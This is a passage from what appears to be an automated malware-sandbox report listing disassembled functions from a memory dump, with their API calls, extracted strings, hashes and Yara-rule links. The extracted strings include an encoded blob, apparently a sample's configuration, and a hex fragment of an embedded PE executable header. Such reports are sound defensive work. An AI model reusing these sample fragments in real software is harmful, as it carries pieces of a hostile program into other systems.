                                                                                                                                                        • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00408FAC, 00408FB9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg$<3x
                                                                                                                                                        • API String ID: 4000879885-2666407513
                                                                                                                                                        • Opcode ID: 8bd9492e4f867ca40cb8bca505bd385bdd82936ff94a6789f8523e0fe196e8a6
                                                                                                                                                        • Instruction ID: d65cfc106405518fb0dfde2f007a596a01e51ced70a86a36281d6bfb82ebfb84
                                                                                                                                                        • Opcode Fuzzy Hash: 8bd9492e4f867ca40cb8bca505bd385bdd82936ff94a6789f8523e0fe196e8a6
                                                                                                                                                        • Instruction Fuzzy Hash: 37C04C1699E57039258432597C47CEB414E8DA5721356067FB910A55816D895DC202BD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040D35A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040D361
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040D35B, 0040D360, 0040D368
                                                                                                                                                        • 48x, xrefs: 0040D369
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg$48x
                                                                                                                                                        • API String ID: 4000879885-1930014250
                                                                                                                                                        • Opcode ID: eb4dcf9de5cf81e00280a013f250081f38c8f5454c3ae13a60ac96f0ed1a56fc
                                                                                                                                                        • Instruction ID: 08b2ad6ec19140bb706d6091351318e576b0c5b462151b7ef4e32ddb0a8f9eb4
                                                                                                                                                        • Opcode Fuzzy Hash: eb4dcf9de5cf81e00280a013f250081f38c8f5454c3ae13a60ac96f0ed1a56fc
                                                                                                                                                        • Instruction Fuzzy Hash: 37C04C229AE57029258433593847CEB814E8DD572135606AFB510662816D895D8242FD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040B3ED, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040B3F4
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040B3EE, 0040B3F3, 0040B3FB
                                                                                                                                                        • <6x, xrefs: 0040B3FC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg$<6x
                                                                                                                                                        • API String ID: 4000879885-3818508828
                                                                                                                                                        • Opcode ID: 7f0043b9a71ec310d59ee3beed8108c175c3d95ca3d27e5648f3470b48abeeb0
                                                                                                                                                        • Instruction ID: fd56bd7ae8fc2d87a9425c9db0f58fa10f997800ea2f5dfb611921775549b15d
                                                                                                                                                        • Opcode Fuzzy Hash: 7f0043b9a71ec310d59ee3beed8108c175c3d95ca3d27e5648f3470b48abeeb0
                                                                                                                                                        • Instruction Fuzzy Hash: F6C04C5299E5303A2584325C3847CEB414E8D967213660A6FF510652816D895D8206BD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040D380, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040D387
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200, xrefs: 0040D381, 0040D386, 0040D38E
                                                                                                                                                        • |8x, xrefs: 0040D38F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200$|8x
                                                                                                                                                        • API String ID: 4000879885-3272162802
                                                                                                                                                        • Opcode ID: 8fa07095de45725ebe4f92f145e496990eebdeef0bef8492909d3f3c04340ad3
                                                                                                                                                        • Instruction ID: eac33d10aca6426d12963c104c714feae91eeb61bc4a3efda0a33702cc3a55ef
                                                                                                                                                        • Opcode Fuzzy Hash: 8fa07095de45725ebe4f92f145e496990eebdeef0bef8492909d3f3c04340ad3
                                                                                                                                                        • Instruction Fuzzy Hash: 9EC04C129DD53029258432583857CEB414E8E55762351166FF540666826E999DC202FD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040180D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00401814
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • D+x, xrefs: 0040181C
                                                                                                                                                        • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040180E, 00401813, 0040181B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg$D+x
                                                                                                                                                        • API String ID: 4000879885-1175947240
                                                                                                                                                        • Opcode ID: 000bc1811385dd5beeb54f6d2b676ea2a97925aabeb1ae0e071f0b3131a10491
                                                                                                                                                        • Instruction ID: 895a0b870917fd1bd91e33fb7afd123699d4b945e98a70131bfdddd20c28e99c
                                                                                                                                                        • Opcode Fuzzy Hash: 000bc1811385dd5beeb54f6d2b676ea2a97925aabeb1ae0e071f0b3131a10491
                                                                                                                                                        • Instruction Fuzzy Hash: 69C04C6299E53029258836583C47CEB424E8E95721356066FB510652926D891D8302BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00403FB3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00403FBA
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • <0x, xrefs: 00403FC2
                                                                                                                                                        • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00403FB4, 00403FC1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg$<0x
                                                                                                                                                        • API String ID: 4000879885-3049485722
                                                                                                                                                        • Opcode ID: a8942cc8ad5510d356b564142af44e96b43303e9863d1098b9196948f412a0c5
                                                                                                                                                        • Instruction ID: 6ce4d08748e08b77b227e34bb7f3f73b2ca98cde28a8de05c237c98181f75683
                                                                                                                                                        • Opcode Fuzzy Hash: a8942cc8ad5510d356b564142af44e96b43303e9863d1098b9196948f412a0c5
                                                                                                                                                        • Instruction Fuzzy Hash: CBC04C1299E530292584325C3947CEB424E8DA5721356066FB511A52D26D895D8302FE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00414FC6, Relevance: 4.6, APIs: 3, Instructions: 116timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00414FCB
                                                                                                                                                        • SetWaitableTimer.KERNELBASE(00000001,?,00000001,00000000,00000000,00000000), ref: 00414FFA
                                                                                                                                                        • GetQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 004150BA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CompletionH_prologQueuedStatusTimerWaitable
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2995059299-0
                                                                                                                                                        • Opcode ID: 0ac0ce651cb377dfbb175b24da3ce17a58921678237f33f2ad5b0d9346e57284
                                                                                                                                                        • Instruction ID: 324d2f80a88f3ea353461f4b1c74fa94218da9e8efc213fb463ba8b511415384
                                                                                                                                                        • Opcode Fuzzy Hash: 0ac0ce651cb377dfbb175b24da3ce17a58921678237f33f2ad5b0d9346e57284
                                                                                                                                                        • Instruction Fuzzy Hash: 2A416972900A0ACFCB15DF91C880BEFB7B9FF88315F00052ED412A6641DB78A949CBE4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00415944, Relevance: 4.6, APIs: 3, Instructions: 80COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: closesocket$ioctlsocket
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1937125420-0
                                                                                                                                                        • Opcode ID: cb90673f1381fbca7ba2fa5274d5889ee7c7e2976141509f40c99a9d0d367c6b
                                                                                                                                                        • Instruction ID: b1e1d38c966291d7ba6df09bccc8acda0f6d45625b17477f5995a09d82777a4c
                                                                                                                                                        • Opcode Fuzzy Hash: cb90673f1381fbca7ba2fa5274d5889ee7c7e2976141509f40c99a9d0d367c6b
                                                                                                                                                        • Instruction Fuzzy Hash: 0F210871910219EBCB10EB64CC85BFEB7B9AF80724F04826BEC14A72C1EB784E45C795
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00416484, Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00416489
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 004164A6
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 004164E5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterH_prologLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 367238759-0
                                                                                                                                                        • Opcode ID: 09bd8116747df04181498dc955d71804d03fa7967c9e664b1d115c34ea8147be
                                                                                                                                                        • Instruction ID: 6c873a38d2a90f09fa4f24cee6f94c7ef67355486a044a14df9f464434e99882
                                                                                                                                                        • Opcode Fuzzy Hash: 09bd8116747df04181498dc955d71804d03fa7967c9e664b1d115c34ea8147be
                                                                                                                                                        • Instruction Fuzzy Hash: 02015BB1A01B04ABC728DF2AD54099BBBF4FF48710B10462EE44A83B01C730EA44CBE5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0068BADE, Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 006A0C42: GetLastError.KERNEL32(?,?,?,00692DE2,00697424,?,006A0BEC,00000001,00000364,?,0068BA4F,0077A468,00000010), ref: 006A0C47
                                                                                                                                                          • Part of subcall function 006A0C42: _free.LIBCMT ref: 006A0C7C
                                                                                                                                                          • Part of subcall function 006A0C42: SetLastError.KERNEL32(00000000), ref: 006A0CB0
                                                                                                                                                        • RtlExitUserThread.NTDLL(?,?,?,0068BC9C,?,?,0068BA87,00000000), ref: 0068BAF0
                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,0068BC9C,?,?,0068BA87,00000000), ref: 0068BB18
                                                                                                                                                        • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,0068BC9C,?,?,0068BA87,00000000), ref: 0068BB2E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorExitLastThread$CloseFreeHandleLibraryUser_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1765993807-0
                                                                                                                                                        • Opcode ID: c6654b4a739282c16a0e6edcb0fa1cc6af5d00759c53113681575545dbbe3f1b
                                                                                                                                                        • Instruction ID: 6966db663efffd20d22127c944544b1dd1ee1576539e8625fc2a3267a28982a3
                                                                                                                                                        • Opcode Fuzzy Hash: c6654b4a739282c16a0e6edcb0fa1cc6af5d00759c53113681575545dbbe3f1b
                                                                                                                                                        • Instruction Fuzzy Hash: FDF05E30900B046BCB357B35C849A9B7B9BAF01764F496715F876D26A1EB70DC41CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00449F62, Relevance: 4.5, APIs: 3, Instructions: 28COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00449F67
                                                                                                                                                          • Part of subcall function 0044A238: __EH_prolog.LIBCMT ref: 0044A23D
                                                                                                                                                          • Part of subcall function 0044A238: new.LIBCMT ref: 0044A263
                                                                                                                                                          • Part of subcall function 0044A238: GetModuleHandleA.KERNEL32(00000000,?,?,00000000), ref: 0044A28A
                                                                                                                                                          • Part of subcall function 0044A238: GetProcAddress.KERNEL32(?,?), ref: 0044A2F6
                                                                                                                                                        • GetTickCount64.KERNEL32 ref: 00449F8D
                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00449F95
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prologTick$AddressCountCount64HandleModuleProc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 698623096-0
                                                                                                                                                        • Opcode ID: b7c4dd1e80fd03b1125421d6b7c98b797954b560c9417725a98bb9a627c1c349
                                                                                                                                                        • Instruction ID: d432c72c9ae12bae8ab774f7184c4cfd7b94f21e20409f6f14a24889351864e5
                                                                                                                                                        • Opcode Fuzzy Hash: b7c4dd1e80fd03b1125421d6b7c98b797954b560c9417725a98bb9a627c1c349
                                                                                                                                                        • Instruction Fuzzy Hash: 15F08C75E022489FDB10AFAA99842DEFFB4FB04305F5081AFE809E2201C7340A049AA6
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004A65FB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: R8J
                                                                                                                                                        • API String ID: 3519838083-300890041
                                                                                                                                                        • Opcode ID: a75301ac05869b08e87e3c074f6e5d557cfcd722ebe09639ff37f16f3d900abd
                                                                                                                                                        • Instruction ID: 5867a854888093d1bee9642c589902deb2e61eb9fb30700b447e8a0783e2703a
                                                                                                                                                        • Opcode Fuzzy Hash: a75301ac05869b08e87e3c074f6e5d557cfcd722ebe09639ff37f16f3d900abd
                                                                                                                                                        • Instruction Fuzzy Hash: B6111771A00249DFCB25DF68C904BAABBF5FF09314F1086AEE89997351D3B59A51CF80
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040A257, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040A25E
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040A258, 0040A25D, 0040A265
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                                                                                                                                                        • API String ID: 4000879885-2292685684
                                                                                                                                                        • Opcode ID: e3429881fc46daa49ce547409b5f51416489a462cf41b540e79c3e403da291b4
                                                                                                                                                        • Instruction ID: db3a9a742bc3b18fed969a22669d7153ee471ef4a14af86773de6eddf42bd562
                                                                                                                                                        • Opcode Fuzzy Hash: e3429881fc46daa49ce547409b5f51416489a462cf41b540e79c3e403da291b4
                                                                                                                                                        • Instruction Fuzzy Hash: BBC08C5289E13029288432283813CEF018E8D95320312027FB400621812CC90CC202BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00402213, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 0040221A
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00402214, 00402219, 00402221
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __onexit_strlen
                                                                                                                                                        • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                                                                                                                                                        • API String ID: 4000879885-2292685684
                                                                                                                                                        • Opcode ID: fca4be47fae512d1e10b30566d30c109f8e739d7e0f30abf1ccf82ab768a1d10
                                                                                                                                                        • Instruction ID: 75e2ee2d00cad990c8ee5a6c383f7e220b5dab7020b6ee9e215765286b6bd1a5
                                                                                                                                                        • Opcode Fuzzy Hash: fca4be47fae512d1e10b30566d30c109f8e739d7e0f30abf1ccf82ab768a1d10
                                                                                                                                                        • Instruction Fuzzy Hash: E1C04C6299E5312D298836583857CEB424E8DD5321356067FB510752827DC91DC303BE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00402ADE, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _strlen.LIBCMT ref: 00402AE5
